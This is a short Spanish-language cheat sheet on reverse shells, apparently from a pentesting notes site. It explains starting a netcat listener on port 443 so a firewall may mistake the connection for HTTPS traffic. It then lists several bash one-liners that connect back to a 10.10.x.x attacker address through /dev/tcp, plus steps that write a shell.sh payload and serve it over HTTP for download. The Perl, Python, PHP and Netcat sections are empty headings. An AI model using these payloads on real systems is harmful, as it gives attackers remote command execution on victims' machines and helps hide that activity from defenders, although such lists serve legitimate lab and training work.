Reverse Shell

Desde nuestra máquina configuramos un listener para recibir la conexión inversa. Usando el comando:

nc -nlvp 443

Abrimos el puerto 443, que se asocia normalmente al tráfico HTTPS. De este modo, el firewall podría interpretar la conexión como una solicitud legítima a una página web, lo que ayuda a disimular la actividad. Cuando la máquina víctima se conecta, obtenemos una shell interactiva para ejecutar comandos remotamente.


Bash

/bin/bash -c 'bash -i >& /dev/tcp/10.10.x.x/443 0>&1'
bash -i >& /dev/tcp/10.10.x.x/443 0>&1

/bin/bash -c 'bash -i >& /dev/tcp/10.10.x.x/443 0>&1'
bash -i >& /dev/tcp/10.10.x.x/443 0>&1

/bin/bash -c '0<&196;exec 196<>/dev/tcp/10.10.x.x/443; sh <&196 >&196 2>&196'
0<&196;exec 196<>/dev/tcp/10.10.x.x/443; sh <&196 >&196 2>&196

Curl + Bash

ATTACKER
echo -n '#!/bin/bash \n/bin/bash -c "bash -i >& /dev/tcp/10.10.x.x/443 0>&1"' > shell.sh

python3 -m http.server 80

Perl

Python

PHP

Netcat

Última actualización

¿Te fue útil?